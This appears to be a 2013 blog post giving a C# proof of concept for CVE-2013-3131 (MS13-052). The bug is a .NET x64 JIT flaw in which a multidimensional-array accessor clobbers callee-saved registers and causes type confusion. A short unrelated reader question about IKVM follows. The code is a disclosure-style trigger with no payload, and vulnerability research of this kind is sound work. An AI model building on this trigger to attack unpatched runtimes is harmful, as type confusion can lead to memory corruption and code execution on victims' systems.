# Wednesday, 10 July 2013
Type Confusion PoC for CVE-2013-3131 (MS13-052)

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

```csharp
using System;
using System.Runtime.CompilerServices;

// Three-byte value type; Get<T> is called with a T[,] of this type.
struct Foo {
  byte b1, b2, b3;
}

class U1 { }
class U2 { }

// Object references that stay live across the array access.
struct StackFields {
  internal object f1;
  internal U1 f2;
  internal U2 f3;
}

class Program {
  long field1;
  long field2;

  static void Main() {
    new Program().Get(new Foo[1, 1]);
  }

  // NoInlining keeps Get in its own frame rather than merging it into Main.
  [MethodImpl(MethodImplOptions.NoInlining)]
  object Get<T>(T[,] arr) {
    StackFields fields = new StackFields();
    fields.f1 = new U1();
    fields.f2 = new U1();
    fields.f3 = new U2();
    arr.ToString();
    object v = arr[0, 0];          // generated multidimensional-array accessor
    field2 = field1;
    Console.WriteLine(fields.f3);  // prints the type of whatever f3 refers to now
    return v;
  }
}
```

This requires .NET 4.5 x64 (and must be built/run in release mode).

The bug is that the accessor generated for the multidimensional array clobbers the RSI and RDI registers. Both are callee-saved in the x64 calling convention, so the caller's live values in them (here, object references) are silently replaced, which is what turns this into a type confusion.

Wednesday, 10 July 2013 13:05:47 (W. Europe Daylight Time, UTC+02:00)
Tuesday, 01 October 2013 11:29:59 (W. Europe Daylight Time, UTC+02:00)
Hi, I tried using IKVMC and successfully converted Java to C#, but I have problems when using the rxtx library: "Attempt to get long field "gnu.io.RXTXPort.eis" with illegal data type conversion to int" when trying to read the input stream from the port. Please help me if you can.
nikks